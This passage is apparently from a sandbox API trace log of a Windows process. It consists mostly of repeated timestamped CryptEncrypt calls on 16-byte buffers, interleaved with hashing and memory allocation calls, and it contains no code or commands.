dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.055] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.055] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.056] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.056] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.056] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.056] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.056] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.056] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.056] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.056] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.056] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.056] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.056] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.056] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.056] malloc (_Size=0x1fd) returned 0x3691270 [0152.056] free (_Block=0x0) [0152.056] free (_Block=0x3df00e0) [0152.056] malloc (_Size=0x1fd) returned 0x3df00e0 [0152.057] free (_Block=0x0) [0152.057] CryptDuplicateHash (in: hHash=0x4329b8, pdwReserved=0x0, dwFlags=0x0, phHash=0x37dfb14 | out: phHash=0x37dfb14) returned 1 [0152.057] CryptHashData (hHash=0x3e10d8, pbData=0x3df00e0, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0152.057] malloc (_Size=0x14) returned 0x3f653e0 [0152.057] free (_Block=0x0) [0152.057] CryptGetHashParam (in: hHash=0x3e10d8, dwParam=0x2, pbData=0x3f653e0, pdwDataLen=0x37dfacc, dwFlags=0x0 | out: pbData=0x3f653e0, pdwDataLen=0x37dfacc) returned 1 [0152.057] CryptHashData (hHash=0x4329b8, pbData=0x3df00e0, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0152.057] free (_Block=0x3f653e0) [0152.057] CryptDestroyHash (hHash=0x3e10d8) returned 1 [0152.057] free (_Block=0x3df00e0) [0152.057] free (_Block=0x3d81e60) [0152.057] malloc (_Size=0x1fd) returned 0x3d81e60 [0152.058] free (_Block=0x0) [0152.058] malloc (_Size=0x1f2) returned 0x3df00e0 [0152.058] free (_Block=0x0) [0152.058] malloc (_Size=0x1f2) returned 0x3def010 [0152.058] free (_Block=0x0) [0152.058] free (_Block=0x0) [0152.058] free (_Block=0x3df00e0) [0152.058] malloc (_Size=0x400) returned 0x3def210 [0152.058] free (_Block=0x0) [0152.058] free (_Block=0x3def010) [0152.058] free (_Block=0x3d81e60) [0152.058] free (_Block=0x3691270) [0152.058] malloc (_Size=0x1fd) returned 0x3d81e60 [0152.058] free (_Block=0x0) [0152.058] malloc (_Size=0x1fd) returned 0x3def618 [0152.059] free (_Block=0x0) [0152.059] free (_Block=0x0) [0152.059] free (_Block=0x3d81e60) [0152.059] malloc (_Size=0x1fd) returned 0x3d81e60 [0152.059] free (_Block=0x0) [0152.059] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.059] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.059] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.059] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.059] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.059] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.059] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.059] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.059] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.059] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.059] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.060] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.060] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.060] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.060] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.060] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.060] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.060] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.060] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.060] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.060] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.061] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.061] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.061] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.061] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.061] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.061] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.061] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.061] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.061] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.061] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.061] malloc (_Size=0x1fd) returned 0x3691270 [0152.061] free (_Block=0x0) [0152.061] free (_Block=0x3def618) [0152.061] free (_Block=0x3d81e60) [0152.061] malloc (_Size=0x1fd) returned 0x3d81e60 [0152.061] free (_Block=0x0) [0152.061] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.062] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.062] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.062] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.062] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.062] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.062] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.062] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.062] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.062] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.062] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.062] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.062] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.062] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.062] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.062] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.063] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.063] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.063] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.063] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.063] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.063] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.063] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.063] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.063] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.063] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.063] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.063] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.063] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.063] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.063] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.063] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.063] malloc (_Size=0x1fd) returned 0x3def618 [0152.064] free (_Block=0x0) [0152.064] free (_Block=0x3691270) [0152.064] free (_Block=0x3d81e60) [0152.064] malloc (_Size=0x1fd) returned 0x3d81e60 [0152.064] free (_Block=0x0) [0152.064] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.064] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.064] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.064] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.064] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.064] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.064] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.064] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.064] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.064] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.064] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.065] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.065] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.065] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.065] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.065] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.065] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.065] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.065] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.065] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.065] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.065] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.065] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.065] CryptEncrypt (in: hKey=0x3e0e18, 